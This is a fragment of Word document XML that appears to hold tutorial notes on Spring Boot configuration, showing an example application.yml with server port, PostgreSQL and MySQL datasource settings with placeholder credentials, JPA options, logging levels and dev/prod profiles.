          <v:rect id="_x0000_i2493" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EA6C55F" w14:textId="77777777" w:rsidR="00764E90" w:rsidRPr="00CE4B95" w:rsidRDefault="00764E90" w:rsidP="00764E90">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mmon YAML File Name:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="727BADF0" w14:textId="77777777" w:rsidR="00764E90" w:rsidRPr="00CE4B95" w:rsidRDefault="00764E90" w:rsidP="00CF15E4">
      <w:pPr>
        <w:ind w:firstLine="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rc/main/resources/application.yml</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DCCB2A6" w14:textId="77777777" w:rsidR="00764E90" w:rsidRPr="00CE4B95" w:rsidRDefault="00000000" w:rsidP="00764E9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E8EA36">
          <v:rect id="_x0000_i2494" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="00EE317F" w14:textId="77777777" w:rsidR="00764E90" w:rsidRPr="00CE4B95" w:rsidRDefault="00764E90" w:rsidP="00764E90">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application.yml</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="322DC6A4"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Theme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>server</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="212A459D"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Theme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">  por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8081</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DBD6F2D"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Theme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="175EF4B5"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Theme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>spring</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30DE71D6"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Theme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">  datasource</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60C1ED6A"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Theme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    ur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jdb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ostgresql</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="880000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>//localhost:5432/mydb</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0ABDF113"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Theme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    user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myuser</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33D61928"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Theme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    passwor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ecret</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="378FD04D"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Theme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">  jpa</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2336D95D"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Theme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    hibernate</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A3D91E4"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Theme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">      ddl</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auto</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update</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="771287C7"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Theme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    show</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q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ue</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CEFE717"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Theme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A811255"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Theme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>logging</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04A90A78"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level</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D5E3BD0" w14:textId="6A0ADE81"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Theme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    or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pringframewor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NFO</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6700D301" w14:textId="77777777" w:rsidR="00764E90" w:rsidRPr="00CE4B95" w:rsidRDefault="00000000" w:rsidP="00764E9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96E0D14">
          <v:rect id="_x0000_i2495" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="25ABAD33" w14:textId="77777777" w:rsidR="00764E90" w:rsidRPr="00CE4B95" w:rsidRDefault="00764E90" w:rsidP="00764E90">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ith Profiles (Environment-based Configs):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56FCA4FE"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Theme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>spring</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35527EA4"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Theme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">  profiles</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38D11DB0"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Theme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    activ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dev</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="496CC70C"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Theme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D1CF697"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Theme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>---</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B2CF9E4"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Theme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="577B5D31"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Theme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>spring</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32B317F0"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Theme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">  profile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dev</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BAA24B0"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Theme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">  datasource</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="694E26E3"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Theme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    ur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jdb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ysql</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="880000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>//localhost:3306/devdb</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7636C015"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Theme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    user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dev</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D73DBDE"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Theme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    passwor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devpass</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50C69F66"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Theme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6EDDFE65"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Theme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>---</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55754993"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Theme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F946100"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Theme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>spring</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A59F33F"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Theme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">  profile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rod</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77D5A534"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Theme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">  datasource</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A2FBC9E"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Theme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    ur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jdb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ysql</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="880000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>//prod-server:3306/proddb</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7463D5A2" w14:textId="77777777"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Theme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    user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rod</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F79AD6A" w14:textId="3CA3F0FE" w:rsidR="00CF15E4" w:rsidRPr="00CE4B95"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Theme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
